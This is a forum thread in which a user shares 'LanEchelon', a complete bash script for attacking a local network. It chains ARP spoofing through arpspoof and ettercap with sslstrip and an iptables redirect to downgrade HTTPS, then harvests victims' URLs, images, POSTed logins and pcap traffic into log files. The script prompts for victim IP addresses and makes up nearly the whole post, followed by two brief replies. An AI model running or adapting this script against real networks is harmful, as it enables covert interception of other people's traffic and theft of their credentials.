Results 1 to 3 of 3

Thread: My script - LanEchelon

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Posts
    15

    Default My script - LanEchelon

    Hi all

    I decided to translate (my language is Polish) and put my script LanEchelon.

    LanEchelon sniff: Traffic et al. pcap, url, images, post, post ssl.

    Sorts the results in the logs.

    It also has a scanner hosts.

    Requirements:

    Arpspoof - Package dsniff
    SSlStrip
    Driftnet
    Ethercap
    Tshark
    ARP-Scan (old version in the repo, new - http://www.nta-monitor.com/tools/arp-scan/)

    Code:
    #!/bin/bash
    #Do zrobienia:
    function pcap {
    if [ $NET = "yes" ] ; then
    sleep 1
    elif [ $NET = "no" ] ; then
    	for x in $CEL ; do
    	tshark -r /root/$SESJA/*.cap -R "ip.addr == $x" -b filesize:92160 -w /root/$SESJA/$SESJA-$x.pcap
    	done
    	rm /root/$SESJA/*.cap
    fi
    }
    function listaurl {
    if [ $NET = "yes" ] ; then
    grep -v $MOJEIP /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url.txt
    elif [ $NET = "no" ] ; then
    	for x in $CEL ; do
    	grep $x /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url-$x.txt
    	done
    fi
    rm /root/$SESJA/$SESJA.txt
    }
    function skanhost {
    echo
    arp-scan -l -I $IFEJS | grep -v $BRAMA | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/&/g' | cut -f 1,2,3,4 > /root/host.list
    if [[ -s host.list ]] ; then
            echo -e "\e[01;33m[!]\e[00m List of active hosts \e[02;37m(IP,MAC,CARD MANUFACTURERJ)\e[00m:"
            echo
            echo ----------------------------------------------------------------------------
            echo -e "\e[1;32m`cat /root/host.list`\e[00m"
            echo ----------------------------------------------------------------------------
            echo
    else
            echo
            echo -e "\e[01;33m[!]\e[00m There are no active hosts..."
            echo
    fi
    }
    function ipinfo {
    MOJEIP=`ifconfig $IFEJS | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
    MASKA=`ifconfig $IFEJS | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
    BRAMA=`route -n | grep $IFEJS | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
    echo
    echo -e "\e[01;33m[!]\e[00m Data network interface \e[01;34m$IFEJS\e[00m:"
    echo
    echo -e "\e[02;35m        GATEWAY: \e[00m$BRAMA"
    echo -e "\e[02;35m        YOUR IP: \e[00m$MOJEIP"
    echo -e "\e[02;35m    SUBNET MASK: \e[00m$MASKA"
    echo
    }
    clear
    echo
    echo ----------------------------------------------------------
    echo -e "|        @?$\e[01;38m>>>>>>>\e[00m}LanEchelon  Script{\e[01;38m<<<<<<<\e[00m@?$        |"
    echo ----------------------------------------------------------
    echo -e "|  \e[02;37msniff: traffic in .pcap, url, images, post, ssl post\e[00m  |"
    echo ----------------------------------------------------------
    echo -e "|            autor: \e[01;34mnum3r\e[00m        version: \e[01;34m1.0\e[00m            |"
    echo ----------------------------------------------------------
    echo
    echo
    echo -e "\e[01;32m[+]\e[00m Starting procedure..."
    echo
    echo
    echo -ne "\e[01;38m[>]\e[00m Please enter a name for the session: "
    read -e SESJA
    echo -ne "\e[01;34m[>]\e[00m Save the entire network traffic in .pcap?? (yes/no): "
    read -e RUCH
    echo -ne "\e[01;38m[>]\e[00m Save the captured images?? (yes/no): "
    read -e GRAFIKA
    echo -ne "\e[01;34m[>]\e[00m Enable option to two-way ARPspoofing?? (yes/no): "
    read -e ARP
    echo -ne "\e[01;38m[>]\e[00m Enter the name of the network interface, np. wlan0: "
    read -e IFEJS
    ipinfo
    echo -ne "\e[01;34m[>]\e[00m Start scanning active hosts on the network?? (yes/no): "
    read -e SKAN
    if [ $SKAN = "yes" ] ; then
    skanhost
    fi
    echo -ne "\e[01;38m[>]\e[00m Attack the whole network?? (tak/nie): "
    read -e NET
    if [ $NET = "yes" ] ; then
    sleep 1
    else
    echo -ne "\e[01;34m[>]\e[00m Enter the IP address(-es) of the victim(-s) (separate space): "
    read -e CEL
    fi
    echo
    echo
    echo -e "\e[01;32m[+]\e[00m Starting attack...(press q to exit the script)"
    sleep 2
    echo
    mkdir /root/$SESJA/
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo "1" > /proc/sys/net/ipv4/ip_forward
    sslstrip -p -f -k -w /root/$SESJA/$SESJA-ssl.log &
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sleep 1
    urlsnarf -i $IFEJS | grep http > /root/$SESJA/$SESJA.txt &
    sleep 1
    xterm -geometry 105x15+1+1 -bg black -fg green -T "SSL Log" -s -sb -si +sk -sl 5000 -e tail -f /root/$SESJA/$SESJA-ssl.log &
    if [ $GRAFIKA = "yes" ] ; then
    mkdir /root/$SESJA/images/
    xterm -geometry 75x15+650+1 -bg black -fg blue -T "Images" -s -sb -si +sk -sl 5000 -e driftnet -i $IFEJS -p -a -d /root/$SESJA/images &
    sleep 1
    else
    sleep 1
    fi
    if [ $NET = "yes" ] && [ $RUCH = "yes" ]; then
    xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA &
    sleep 1
    ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA
    elif [ $NET = "yes" ] && [ $RUCH = "no" ]; then
    xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA &
    sleep 1
    ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA
    fi
    for x in $CEL ; do
      if [ $NET = "yes" ] && [ $ARP = "no" ]; then
      xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA &
      sleep 1
      xterm -geometry 100x6+1+605 -bg black -fg yellow -T "ARPspoof 2" -e arpspoof -i $IFEJS -t $BRAMA $x &
      sleep 1
      elif [ $NET = "no" ] && [ $ARP = "no" ]; then
      xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA &
      sleep 1
      fi
    done
    if [ $NET = "no" ] && [ $RUCH = "yes" ]; then
    ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA
    elif [ $NET = "no" ] && [ $RUCH = "yes" ]; then
    ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA
    fi
    echo
    echo -e "\e[01;32m[+]\e[00m Stopping attack..."
    echo
    killall -q -w arpspoof
    killall -q -w xterm
    killall -q -w sslstrip
    killall -q -w urlsnarf
    killall -q driftnet
    killall -q -w python
    listaurl
    if [ $RUCH = "yes" ] ; then
    pcap
    else
    sleep 1
    fi
    rm /root/host.list
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo "0" > /proc/sys/net/ipv4/ip_forward
    echo
    echo
    echo -e "\e[01;32m[+]\e[00m Procedure completed..."
    echo -e "\e[01;32m[+]\e[00m See you later..."
    echo
    exit
    Maybe someone will like it.

    Best Regards

  2. #2
    Senior Member savioboyz's Avatar
    Join Date
    Oct 2010
    Location
    Nigeria
    Posts
    118

    Default Re: My script - LanEchelon

    pretty nice script... Good Job
    Last edited by savioboyz; 03-23-2011 at 09:32 PM.
    Saviour Emmauel Ekiko

  3. #3
    Member
    Join Date
    May 2010
    Location
    Frankfurt/Main
    Posts
    58

    Default Re: My script - LanEchelon

    i guess it doesnt work with only one wlan0 device, which is connected ?

Similar Threads

  1. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  2. Replies: 10
    Last Post: 07-12-2010, 03:04 PM
  3. Script help
    By isdigit in forum OLD Newbie Area
    Replies: 2
    Last Post: 08-21-2009, 02:35 AM
  4. WPA script
    By procraft7399 in forum OLD Newbie Area
    Replies: 27
    Last Post: 04-29-2009, 10:10 AM
  5. LZM Script/lzm2dir script
    By unseen in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 11-29-2007, 02:51 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •